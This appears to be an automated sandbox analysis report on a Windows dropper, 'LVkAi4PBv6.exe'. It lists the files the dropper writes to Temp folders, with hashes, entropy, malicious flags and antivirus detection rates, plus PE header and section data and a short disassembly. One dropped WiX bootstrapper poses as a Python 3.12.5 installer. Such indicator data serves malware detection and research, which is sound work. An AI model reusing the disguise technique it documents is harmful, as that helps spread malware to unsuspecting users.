                                                                                                                                                                                                                                                                                                MD5:3085505DB1512B966530B829E136BDCF
                                                                                                                                                                                                                                                                                                SHA1:C105A4CB691CC2302878C71BE8D375E4018CDB29
                                                                                                                                                                                                                                                                                                SHA-256:2B85E3A5C3DA072A33AB1372B102EDD4AF6D02D8B74A3E5C949B3F9E628521B7
                                                                                                                                                                                                                                                                                                SHA-512:5A1FD3C4A534C00246C2A7CB9B92775E70FFB02653B2E2F442852466B5558D7B5D88168284F4EA20E528523B2ADD9907EF37077F20DB79EB27285E045CF13A72
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Process:C:\Windows\Temp\{C8FC8EA1-BE1C-448C-9B0E-0B391DC1BF81}\.ba\AdobeSync.exe
                                                                                                                                                                                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):570496
                                                                                                                                                                                                                                                                                                Entropy (8bit):6.5259314477231305
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:12288:BpFE340h3e34GVZQACkIPYhUgiW6QR7t5183Ooc8SHkC2eLgAfO:Bph0h3e3vgzPA83Ooc8SHkC2eLgAfO
                                                                                                                                                                                                                                                                                                MD5:90A32D8E07F7FB3D102EAB1DA28F0723
                                                                                                                                                                                                                                                                                                SHA1:0903911BBB5D00F68BA51895FA898B38A5453DED
                                                                                                                                                                                                                                                                                                SHA-256:004ED24507DC7307CEC1A3732FA57EABF19E918C3E1B54561E6CC01F554C0B77
                                                                                                                                                                                                                                                                                                SHA-512:2C69586D5C5D2B4B5DECF2BF479554C3D0FF5F5A6FBACB01B8583EA8D96D0AE9C850C30A0D43EB2AD1116BE901578D15FE08FCE3E505440C854082C208A79F1A
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                Process:C:\Windows\Temp\{C8FC8EA1-BE1C-448C-9B0E-0B391DC1BF81}\.ba\AdobeSync.exe
                                                                                                                                                                                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):653952
                                                                                                                                                                                                                                                                                                Entropy (8bit):6.885961951552677
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:12288:5hr4UC+Ju/A0BI4yWkoGKJwZ9axKmhYTMAO7wFKjCUmRyyPe:9JfyZFGKJjxKmhSMAB6CUmRyyPe
                                                                                                                                                                                                                                                                                                MD5:11D49148A302DE4104DED6A92B78B0ED
                                                                                                                                                                                                                                                                                                SHA1:FD58A091B39ED52611ADE20A782EF58AC33012AF
                                                                                                                                                                                                                                                                                                SHA-256:CEB0947D898BC2A55A50F092F5ED3F7BE64AC1CD4661022EEFD3EDD4029213B0
                                                                                                                                                                                                                                                                                                SHA-512:FDC43B3EE38F7BEB2375C953A29DB8BCF66B73B78CCC04B147E26108F3B650C0A431B276853BB8E08167D34A8CC9C6B7918DAEF9EBC0A4833B1534C5AFAC75E4
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                Process:C:\Windows\Temp\{C8FC8EA1-BE1C-448C-9B0E-0B391DC1BF81}\.ba\AdobeSync.exe
                                                                                                                                                                                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):249232
                                                                                                                                                                                                                                                                                                Entropy (8bit):6.822042592978165
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:6144:hiDoxpdJLEfunorfdoU9nxGIndwR7j0E3/AE6u6J:QDApalrGIdwR7jZ3/B6/J
                                                                                                                                                                                                                                                                                                MD5:596439B3A9F9EA44FF28E2974F69AB07
                                                                                                                                                                                                                                                                                                SHA1:A2074CD3D39045902F82A072455420AB7101A036
                                                                                                                                                                                                                                                                                                SHA-256:8CC91D57D45B46B3439EAA017BF1DEB8E177F15245BA6F18EBCF2BD0A173A4F3
                                                                                                                                                                                                                                                                                                SHA-512:1DE8D41FEC0844999B88C0CB738AAC71C0AE895A51E91F6465AFAA864537E692E4576E6699B4976E62AA2C38EF9125D9AAF09A72ACAA068A0C2B05D413AF858A
                                                                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                Process:C:\Users\user\Desktop\LVkAi4PBv6.exe
                                                                                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):6305325
                                                                                                                                                                                                                                                                                                Entropy (8bit):7.9787714785946955
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:196608:DfUMP3JauYusFpUjU+Xm7KdVY4aKo7TNn5QjvA:r58jucejnmkVY4zoZ5Qs
                                                                                                                                                                                                                                                                                                MD5:9C540950F5A8981844FF33BFC55D2F36
                                                                                                                                                                                                                                                                                                SHA1:8C70F2BCB995CE313843CF7103C659C12EB263DC
                                                                                                                                                                                                                                                                                                SHA-256:DD53AC67D905DEFD4BD1F2B9B413DFC679E7C076E92792BE650C38659E1557C5
                                                                                                                                                                                                                                                                                                SHA-512:7D87E02B60647134758F4C20BDB18A1DEF78BC9B69D337B6EE6D9B190968749D028479D0F6758CDFD8C76DF454F7AE68395A4EBDCB6D99CEA5B0B48CD5BA685B
                                                                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                                                                Process:C:\Windows\Temp\{C5C6CF0D-9A4E-4872-8275-1B31F19D2062}\.cr\LVkAi4PBv6.exe
                                                                                                                                                                                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):168960
                                                                                                                                                                                                                                                                                                Entropy (8bit):6.635989544957891
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3072:mm3ITKGHS4tcdKwmcOTw1hOqLKpJzadzwxxYBcdgNqbeBTg4vRPzr4zvRjN:mVTxS4tcdKVw1iB8AxrGqG4J
                                                                                                                                                                                                                                                                                                MD5:77610CBDCAC173785E2FB18CCB522574
                                                                                                                                                                                                                                                                                                SHA1:315E7DE9D5DA5C13364D6A5E90C7EFF80A15DA48
                                                                                                                                                                                                                                                                                                SHA-256:40CE54280DBA1A8F029F4A8AFDD19F5D898CE4A221104ED6F9B0F619D54F912F
                                                                                                                                                                                                                                                                                                SHA-512:AA81C82F122D75B3DCA6993A69C051779F9E63E1006E1B3AAB3C6E1A82AF66BBB100CF091A160049C6B041E53ADA6AF71033FC23ED1EA8888F9F3C161FA11206
                                                                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 30%
                                                                                                                                                                                                                                                                                                Process:C:\Windows\Temp\{C5C6CF0D-9A4E-4872-8275-1B31F19D2062}\.cr\LVkAi4PBv6.exe
                                                                                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):1219488
                                                                                                                                                                                                                                                                                                Entropy (8bit):6.312582930861741
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:24576:+heavSigvk0vhkzswHD4/V3OQdnYKYc4wXUyuy1:qP710vezrj4dJYFYUyuy1
                                                                                                                                                                                                                                                                                                MD5:F778E9136AB0DB9DE9802A7043DE50A7
                                                                                                                                                                                                                                                                                                SHA1:850DCA074534A14FDB9ADA6AFACEEA88558764E0
                                                                                                                                                                                                                                                                                                SHA-256:90803A583E9F693DE5E7B8A196832436F6F648B27FB82E55904C256F30CC8B3A
                                                                                                                                                                                                                                                                                                SHA-512:CD6C5C3537F05AD5826D503E38B8E6EF2EAF668616BEC15BA51AD3D81E0337A72779D7CA6AF9E8EBEE12D713891B30C0B73BF34718552BC9F4E7D8909B998156
                                                                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                Process:C:\Windows\Temp\{C5C6CF0D-9A4E-4872-8275-1B31F19D2062}\.cr\LVkAi4PBv6.exe
                                                                                                                                                                                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):110472
                                                                                                                                                                                                                                                                                                Entropy (8bit):6.411600464209584
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3072:FeQixAO/A/0VSaGHvP5GeBTEpP2t31VrxrcZ0KOKbfQp:uKO+0VSnKOKbop
                                                                                                                                                                                                                                                                                                MD5:759D71FC9442AB5A9B5749C0F6C0C263
                                                                                                                                                                                                                                                                                                SHA1:07A68C6922D443EB9D6D445DA18AE8A6D92F7AC6
                                                                                                                                                                                                                                                                                                SHA-256:109647F58E7E8386A4C025F2C8175A4D638E5C0E62768953390764010EA22A2E
                                                                                                                                                                                                                                                                                                SHA-512:E3EFE66C76EA81285BA01B1978FDB3E807EB0BF2CFE0373BB6FEF06F2FD7D9DDC3269ACF0D87517CBF9BEA5FA09B2703A03792491DC8265D26B724D7DCA106C7
                                                                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                Process:C:\Windows\Temp\{C5C6CF0D-9A4E-4872-8275-1B31F19D2062}\.cr\LVkAi4PBv6.exe
                                                                                                                                                                                                                                                                                                File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with very long lines (473), with CRLF line terminators
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):2006
                                                                                                                                                                                                                                                                                                Entropy (8bit):3.7572989677816073
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:48:y+03qHhhO7YDTT3ne1REDHV5JC0wNqycUbTXRC+bLqihGrWrol:Xn7n6q80wMycsRCDKGrN
                                                                                                                                                                                                                                                                                                MD5:ADBA259B1418C9ED84277688BFEEFAA7
                                                                                                                                                                                                                                                                                                SHA1:A6EF522036403047FF578DEF1E0AFD616A277357
                                                                                                                                                                                                                                                                                                SHA-256:6DF90329C4E3DF98DBB91556C98CDB46CD0258B49A500999284096A9DF972BDA
                                                                                                                                                                                                                                                                                                SHA-512:9F90BD3C1892CE45870DE3FEC0F83516E5B61C1774024C03EC2BCDAEB7C8AC1F05536BF0403C77F520D8D39C0ACBE11769A32A3FE49571B71F1D4DCC5FCFFE66
                                                                                                                                                                                                                                                                                                Malicious:false
Preview:<?xml version="1.0" encoding="utf-16"?> <BootstrapperApplicationData xmlns="http://schemas.microsoft.com/wix/2010/BootstrapperApplicationData"> <WixBundleProperties DisplayName="Scabbard" LogPathVariable="WixBundleLog" Compressed="no" Id="{5c679b6d-98d4-4b78-960a-1821c92274db}" UpgradeCode="{6CDE78EC-4C1C-46AB-BBE9-9746BE0D7F86}" PerMachine="no" /> <WixPackageProperties Package="Sluit" Vital="yes" DisplayName="Python 3.12.5 Executables (64-bit)" DownloadSize="741376" PackageSize="741376"
                                                                                                                                                                                                                                                                                                Process:C:\Windows\Temp\{C5C6CF0D-9A4E-4872-8275-1B31F19D2062}\.cr\LVkAi4PBv6.exe
                                                                                                                                                                                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):255392
                                                                                                                                                                                                                                                                                                Entropy (8bit):6.5751135995470245
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:6144:z7qdWWmoR0sztnfGIUbmUL1ueM+d9euhAOZD3FCP3z:Sssztnfu9ueM+doKX4P3z
                                                                                                                                                                                                                                                                                                MD5:7C95B91566BA5A2D8BF70C2BCF13D712
                                                                                                                                                                                                                                                                                                SHA1:B01F54AE2964480B8AEB2817285219AB8A2C79C0
                                                                                                                                                                                                                                                                                                SHA-256:39230D24CF7602FF2B00A7FF13BA5160B9B3446FBA7C6F6295DD4FB2EB408DF5
                                                                                                                                                                                                                                                                                                SHA-512:AB70A77C05EC42B77166D2E7FC81B18AD390E2CB32249F35355AFD4271AEDCFBDE882992AE0E84A9F95453CB9FD05AE224713EE3FDA93BABC6C9CFB572B50FAD
                                                                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........b.o.1.o.1.o.1...0.o.1...0.o.1...0.o.1...0.o.1...0.o.1...0.o.1...0.o.1.o.1.o.1...0.o.1...0.o.1..W1.o.1.o?1.o.1...0.o.1Rich.o.1................PE..L...C.3`.........."!.........R......................................................~.....@......................... .......,...x.......p........................(...`..p...................@a......p...@...................<...@....................text............................... ..`.rdata..N...........................@..@.data...............................@....rsrc...p...........................@..@.reloc...(.......*..................@..B........................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                Process:C:\Windows\Temp\{C5C6CF0D-9A4E-4872-8275-1B31F19D2062}\.cr\LVkAi4PBv6.exe
                                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):62969
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.539146899101455
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:1536:wtVMpSzCLmJZriRxBfJJXWT/5F0Oy+loZ:wvuSJhEHfJJGT/5F0v+SZ
                                                                                                                                                                                                                                                                                                MD5:9076AB572C60AAB6B113F4F9108A9CC8
                                                                                                                                                                                                                                                                                                SHA1:1439248640CE9418B5BA13862160DFA00364390B
                                                                                                                                                                                                                                                                                                SHA-256:1E5750FFBDC77FCE17521A2EF5754A998B002A87E9036B1157FC2A63DD91C30D
                                                                                                                                                                                                                                                                                                SHA-512:B42B6162930A5CB9B0FEBC5CE1C6FD5EEF7B02AD041C302820541968EE5FFF1B779D60BDC458B5539B9AEF2F9169F493392A8CD819F435F10D71941A55761287
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Process:C:\Windows\Temp\{C5C6CF0D-9A4E-4872-8275-1B31F19D2062}\.cr\LVkAi4PBv6.exe
                                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):4526833
                                                                                                                                                                                                                                                                                                Entropy (8bit):7.959653744732072
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:98304:9M79mFIVQgIBckuHqM4KVqnl8dAQiORny+fRt:91MQgIBcksVqKdALO9t
                                                                                                                                                                                                                                                                                                MD5:3085505DB1512B966530B829E136BDCF
                                                                                                                                                                                                                                                                                                SHA1:C105A4CB691CC2302878C71BE8D375E4018CDB29
                                                                                                                                                                                                                                                                                                SHA-256:2B85E3A5C3DA072A33AB1372B102EDD4AF6D02D8B74A3E5C949B3F9E628521B7
                                                                                                                                                                                                                                                                                                SHA-512:5A1FD3C4A534C00246C2A7CB9B92775E70FFB02653B2E2F442852466B5558D7B5D88168284F4EA20E528523B2ADD9907EF37077F20DB79EB27285E045CF13A72
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Process:C:\Windows\Temp\{C5C6CF0D-9A4E-4872-8275-1B31F19D2062}\.cr\LVkAi4PBv6.exe
                                                                                                                                                                                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):570496
                                                                                                                                                                                                                                                                                                Entropy (8bit):6.5259314477231305
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:12288:BpFE340h3e34GVZQACkIPYhUgiW6QR7t5183Ooc8SHkC2eLgAfO:Bph0h3e3vgzPA83Ooc8SHkC2eLgAfO
                                                                                                                                                                                                                                                                                                MD5:90A32D8E07F7FB3D102EAB1DA28F0723
                                                                                                                                                                                                                                                                                                SHA1:0903911BBB5D00F68BA51895FA898B38A5453DED
                                                                                                                                                                                                                                                                                                SHA-256:004ED24507DC7307CEC1A3732FA57EABF19E918C3E1B54561E6CC01F554C0B77
                                                                                                                                                                                                                                                                                                SHA-512:2C69586D5C5D2B4B5DECF2BF479554C3D0FF5F5A6FBACB01B8583EA8D96D0AE9C850C30A0D43EB2AD1116BE901578D15FE08FCE3E505440C854082C208A79F1A
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........#%..Mv..Mv..Mv.66v..Mv...v..Mv..Lv:.Mv...v..Mv...v..Mv...v..Mv...v..Mv...v..Mv...v..Mv...v..MvRich..Mv........................PE..L.....i[...........!.....4...p..............P....Hx......................................@..........................P..,....E..<...............................D3...................................%..@............................................text....2.......4.................. ..`.data...t'...P.......8..............@....rsrc................R..............@..@.reloc..HC.......D...V..............@..B................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                Process:C:\Windows\Temp\{C5C6CF0D-9A4E-4872-8275-1B31F19D2062}\.cr\LVkAi4PBv6.exe
                                                                                                                                                                                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):653952
                                                                                                                                                                                                                                                                                                Entropy (8bit):6.885961951552677
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:12288:5hr4UC+Ju/A0BI4yWkoGKJwZ9axKmhYTMAO7wFKjCUmRyyPe:9JfyZFGKJjxKmhSMAB6CUmRyyPe
                                                                                                                                                                                                                                                                                                MD5:11D49148A302DE4104DED6A92B78B0ED
                                                                                                                                                                                                                                                                                                SHA1:FD58A091B39ED52611ADE20A782EF58AC33012AF
                                                                                                                                                                                                                                                                                                SHA-256:CEB0947D898BC2A55A50F092F5ED3F7BE64AC1CD4661022EEFD3EDD4029213B0
                                                                                                                                                                                                                                                                                                SHA-512:FDC43B3EE38F7BEB2375C953A29DB8BCF66B73B78CCC04B147E26108F3B650C0A431B276853BB8E08167D34A8CC9C6B7918DAEF9EBC0A4833B1534C5AFAC75E4
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..................6.........!.R...7.....&.....0.....6.....3...Rich..........PE..L.....i[...........!.....\..........@-.......p....Rx.........................0......?T....@..............................|..P...(................................3......................................@............................................text...t[.......\.................. ..`.data....g...p...D...`..............@....rsrc...............................@..@.reloc...7.......8..................@..B................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                Process:C:\Windows\Temp\{C5C6CF0D-9A4E-4872-8275-1B31F19D2062}\.cr\LVkAi4PBv6.exe
                                                                                                                                                                                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):249232
                                                                                                                                                                                                                                                                                                Entropy (8bit):6.822042592978165
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:6144:hiDoxpdJLEfunorfdoU9nxGIndwR7j0E3/AE6u6J:QDApalrGIdwR7jZ3/B6/J
                                                                                                                                                                                                                                                                                                MD5:596439B3A9F9EA44FF28E2974F69AB07
                                                                                                                                                                                                                                                                                                SHA1:A2074CD3D39045902F82A072455420AB7101A036
                                                                                                                                                                                                                                                                                                SHA-256:8CC91D57D45B46B3439EAA017BF1DEB8E177F15245BA6F18EBCF2BD0A173A4F3
                                                                                                                                                                                                                                                                                                SHA-512:1DE8D41FEC0844999B88C0CB738AAC71C0AE895A51E91F6465AFAA864537E692E4576E6699B4976E62AA2C38EF9125D9AAF09A72ACAA068A0C2B05D413AF858A
                                                                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                Entropy (8bit):7.982301715397725
                                                                                                                                                                                                                                                                                                TrID:
                                                                                                                                                                                                                                                                                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                                                                                                                                • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                                                                                                                • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                                                                                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                                                                                                File name:LVkAi4PBv6.exe
                                                                                                                                                                                                                                                                                                File size:7'012'811 bytes
                                                                                                                                                                                                                                                                                                MD5:dc1a25a3cecfd804e569a7238ba1ec7f
                                                                                                                                                                                                                                                                                                SHA1:7bf13bcd7957fa71d6e0d70d2a0e0b578c040a62
                                                                                                                                                                                                                                                                                                SHA256:08e80182805b40159b51722d3993635343dd14b67e262820599031fa9ecd96d0
                                                                                                                                                                                                                                                                                                SHA512:e6b19f24bf60fcd1949496b289728a6a0f8a705fa0e11b5b797bdadf474f87ecd733e99c91c607e6de0d4325a85c134dbf8bdf079eca22d044a363619e5b3d67
                                                                                                                                                                                                                                                                                                SSDEEP:196608:DfUMP3JauYusFpUjU+Xm7KdVY4aKo7TNn5QjvgEhr:r58jucejnmkVY4zoZ5Qrhr
                                                                                                                                                                                                                                                                                                TLSH:34662332A4614033D7F201B3AD6892347EBCEF28175099A9E3D4BD5D6EF44922BB7253
                                                                                                                                                                                                                                                                                                Icon Hash:a9e8e8e9e8e8e8a9
                                                                                                                                                                                                                                                                                                Entrypoint:0x42e2a6
                                                                                                                                                                                                                                                                                                Entrypoint Section:.text
                                                                                                                                                                                                                                                                                                Digitally signed:false
                                                                                                                                                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                                                                                                                                                Subsystem:windows gui
                                                                                                                                                                                                                                                                                                Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE, REMOVABLE_RUN_FROM_SWAP, NET_RUN_FROM_SWAP
                                                                                                                                                                                                                                                                                                DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                                                                                                Time Stamp:0x5A10AD86 [Sat Nov 18 22:00:38 2017 UTC]
                                                                                                                                                                                                                                                                                                TLS Callbacks:
                                                                                                                                                                                                                                                                                                CLR (.Net) Version:
                                                                                                                                                                                                                                                                                                OS Version Major:5
                                                                                                                                                                                                                                                                                                OS Version Minor:1
                                                                                                                                                                                                                                                                                                File Version Major:5
                                                                                                                                                                                                                                                                                                File Version Minor:1
                                                                                                                                                                                                                                                                                                Subsystem Version Major:5
                                                                                                                                                                                                                                                                                                Subsystem Version Minor:1
                                                                                                                                                                                                                                                                                                Import Hash:d7e2fd259780271687ffca462b9e69b7
                                                                                                                                                                                                                                                                                                Instruction
                                                                                                                                                                                                                                                                                                call 00007F55E8AF739Fh
                                                                                                                                                                                                                                                                                                jmp 00007F55E8AF6D13h
                                                                                                                                                                                                                                                                                                mov eax, dword ptr [esp+08h]
                                                                                                                                                                                                                                                                                                mov ecx, dword ptr [esp+10h]
                                                                                                                                                                                                                                                                                                or ecx, eax
                                                                                                                                                                                                                                                                                                mov ecx, dword ptr [esp+0Ch]
                                                                                                                                                                                                                                                                                                jne 00007F55E8AF6E8Bh
                                                                                                                                                                                                                                                                                                mov eax, dword ptr [esp+04h]
                                                                                                                                                                                                                                                                                                mul ecx
                                                                                                                                                                                                                                                                                                retn 0010h
                                                                                                                                                                                                                                                                                                push ebx
                                                                                                                                                                                                                                                                                                mul ecx
                                                                                                                                                                                                                                                                                                mov ebx, eax
                                                                                                                                                                                                                                                                                                mov eax, dword ptr [esp+08h]
                                                                                                                                                                                                                                                                                                mul dword ptr [esp+14h]
                                                                                                                                                                                                                                                                                                add ebx, eax
                                                                                                                                                                                                                                                                                                mov eax, dword ptr [esp+08h]
                                                                                                                                                                                                                                                                                                mul ecx
                                                                                                                                                                                                                                                                                                add edx, ebx
                                                                                                                                                                                                                                                                                                pop ebx
                                                                                                                                                                                                                                                                                                retn 0010h
                                                                                                                                                                                                                                                                                                int3
                                                                                                                                                                                                                                                                                                int3
                                                                                                                                                                                                                                                                                                int3
                                                                                                                                                                                                                                                                                                int3
                                                                                                                                                                                                                                                                                                int3
                                                                                                                                                                                                                                                                                                int3
                                                                                                                                                                                                                                                                                                int3
                                                                                                                                                                                                                                                                                                int3
                                                                                                                                                                                                                                                                                                int3
                                                                                                                                                                                                                                                                                                int3
                                                                                                                                                                                                                                                                                                int3
                                                                                                                                                                                                                                                                                                int3
                                                                                                                                                                                                                                                                                                cmp cl, 00000040h
                                                                                                                                                                                                                                                                                                jnc 00007F55E8AF6E97h
                                                                                                                                                                                                                                                                                                cmp cl, 00000020h
                                                                                                                                                                                                                                                                                                jnc 00007F55E8AF6E88h
                                                                                                                                                                                                                                                                                                shrd eax, edx, cl
                                                                                                                                                                                                                                                                                                shr edx, cl
                                                                                                                                                                                                                                                                                                ret
                                                                                                                                                                                                                                                                                                mov eax, edx
Programming Language:
• [ C ] VS2008 SP1 build 30729
• [IMP] VS2008 SP1 build 30729
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x686b4 | 0xb4 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x6d000 | 0x189ac | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x86000 | 0x3dfc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x67650 | 0x54 | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x676a4 | 0x18 | .rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x67030 | 0x40 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x4b000 | 0x3e0 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x68234 | 0x100 | .rdata
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x49937 | 0x49a00 | 2319c0baa707bb66cc0bc08c55a13d8c | False | 0.5314688561120543 | data | 6.570006046413636 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x4b000 | 0x1ed60 | 0x1ee00 | 8ad6c4e18165c6d8ccdc97bab683438d | False | 0.3136386639676113 | data | 5.114228301263695 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x6a000 | 0x1730 | 0xa00 | 00fde973df27dc2d36084e16d6dddbdf | False | 0.274609375 | firmware 2005 v9319 (revision 0) N\346@\273\261\031\277D V2, 0 bytes or less, UNKNOWN2 0xffffffff, at 0 0 bytes , at 0 0 bytes , at 0x20a14600 | 3.1526594027632213 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.wixburn | 0x6c000 | 0x38 | 0x200 | 6a6fa226648aa5455d00e43308ab550f | False | 0.107421875 | data | 0.5813091016060967 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
